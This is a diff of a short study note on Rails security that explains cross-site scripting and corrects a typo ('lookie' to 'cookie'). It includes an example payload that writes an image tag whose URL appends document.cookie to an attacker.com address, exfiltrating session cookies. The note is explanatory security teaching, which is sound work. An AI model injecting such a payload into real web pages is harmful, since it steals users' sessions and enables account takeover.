schitresh/software_development/frameworks/rails/5_security/5_injection.md

 - 'document.cookie' holds the cookie of the originating web server
   - You can read & write this property if you embed the code directly in HTML document
   - <script>document.write(document.cookie);</script>
-  - But that is not useful to the attacker as they will see their own lookie
+  - But that is not useful to the attacker as they will see their own cookie
 - This will try to load an image from the specific url plus the cookie
   - document.write('<img src="http://www.attacker.com/' + document.cookie + '">')
   - This url doesn't exist, so the browser displays nothing